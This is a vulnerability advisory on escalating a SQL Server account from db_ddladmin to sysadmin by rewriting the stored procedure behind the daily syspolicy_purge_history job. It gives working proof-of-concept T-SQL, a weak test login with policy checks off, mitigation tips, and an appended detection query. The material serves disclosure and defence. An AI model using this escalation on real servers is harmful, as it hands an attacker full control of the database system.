
Microsoft SQL Server db_ddladmin Privilege Escalation

Posted Jan 9, 2024
Authored by Emad Al-Mousa

Microsoft SQL Server versions 2014 through 2022 suffer from a db_ddladmin privilege escalation vulnerability. When this was escalated to Microsoft as a concern, they opted to update their documentation to note that this is possible instead of addressing the issue.

tags | advisory
SHA-256 | cac3f425f4cca8e96dd9616578d2788098261640c115710127e2b2ec6da21b6c

Title: SQL Server Privilege Escalation from db_ddladmin to sysadmin
Product: Microsoft SQL Server
Affected Version(s): 2014,2016,2017,2019,2022
Tested Version(s): 2014,2016,2017,2019,2022
Risk Level: Medium
Author of Advisory: Emad Al-Mousa

Overview:

Privilege escalation is a serious security attack in which attackers seek to compromise IT infrastructure and systems. Attackers exploit either vulnerabilities or misconfigurations in the system to escalate their permissions and take over the whole system.

*****************************************
Vulnerability Details:

By design, installing the SQL Server database engine creates a job called “syspolicy_purge_history”, and by design this job runs every day. This job can be weaponized for a privilege escalation attack.

The attacker needs to compromise a database account that is added as a user in the MSDB system database and is granted the db_ddladmin role.


*****************************************
Proof of Concept (PoC):


I will create a dummy account called “toto” (for the sake of the simulation it will be a SQL-authenticated account):

USE [master]
GO
CREATE LOGIN [toto] WITH PASSWORD=N'toto', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO

Then I will add the account as a database user in the MSDB system database with the db_ddladmin role:

USE [msdb]
GO
CREATE USER [toto] FOR LOGIN [toto]
GO
ALTER ROLE [db_ddladmin] ADD MEMBER [toto]
GO

Then, as toto, I will execute the following modification against the job's stored procedure, sp_syspolicy_purge_history:

USE [msdb]
GO
-- db_ddladmin in msdb is sufficient to ALTER this procedure; its body is replaced outright.
ALTER PROCEDURE [dbo].[sp_syspolicy_purge_history]
AS
BEGIN
    -- Runs at the job's next scheduled execution.
    ALTER SERVER ROLE [sysadmin] ADD MEMBER [toto]
END
GO


At the next scheduled run time of the syspolicy_purge_history job, the account toto will be escalated to the SYSADMIN role, which means he/she will take over the whole SQL Server database system.


-***- To protect against such attacks, follow these security tips:

Implement in-place auditing for privilege escalation attacks (smart auditing: do not audit everything, since auditing imposes performance overhead).

Implement the least-privilege principle in your environment; do not grant any account extra permissions that can be weaponized for a security breach.

A strong identity and account management approach should be in place; password policies are important to make brute-force attacks challenging.

Patch your environments and follow security best practices.
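As an added defensive example (not part of the original advisory), the following T-SQL checks msdb for the two conditions the PoC relies on: users holding db_ddladmin in msdb, and a modified sp_syspolicy_purge_history whose body now references server-role changes. It assumes a login permitted to read msdb metadata and object definitions; the LIKE patterns are heuristics, so compare any hit against a known-good copy of the procedure.

```sql
-- Added detection example; not part of the original advisory.
-- Assumes the executing login can read msdb catalog views and object definitions.
USE [msdb];
GO

-- 1. Who holds db_ddladmin in msdb? Each of these users can ALTER msdb procedures,
--    including the one executed daily by the syspolicy_purge_history job.
SELECT  dp.name      AS msdb_user,
        sp.name      AS server_login,
        sp.type_desc AS login_type
FROM    sys.database_role_members AS rm
JOIN    sys.database_principals   AS r  ON r.principal_id  = rm.role_principal_id
JOIN    sys.database_principals   AS dp ON dp.principal_id = rm.member_principal_id
LEFT JOIN sys.server_principals   AS sp ON sp.sid = dp.sid
WHERE   r.name = N'db_ddladmin';
GO

-- 2. Has sp_syspolicy_purge_history been altered, and does its body now touch
--    server roles? The stock procedure only purges policy-management history.
--    modify_date later than create_date can also result from patching, so
--    treat the verdict as a lead, not proof, and diff the body against a baseline.
SELECT  o.name,
        o.create_date,
        o.modify_date,
        CASE WHEN m.definition LIKE N'%ALTER SERVER ROLE%'
               OR m.definition LIKE N'%sp_addsrvrolemember%'
             THEN 'SUSPICIOUS'
             WHEN o.modify_date > o.create_date
             THEN 'MODIFIED - review'
             ELSE 'ok' END AS verdict
FROM    sys.objects     AS o
JOIN    sys.sql_modules AS m ON m.object_id = o.object_id
WHERE   o.name = N'sp_syspolicy_purge_history';
GO
```

Scheduling both queries alongside the job itself (or alerting on ALTER PROCEDURE events in msdb via SQL Server Audit) gives the "smart auditing" the tips above call for without auditing everything.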

*****************************************
References:
https://databasesecurityninja.wordpress.com/2024/01/07/sql-server-privilege-escalation-from-db_ddladmin-to-sysadmin/
https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver16
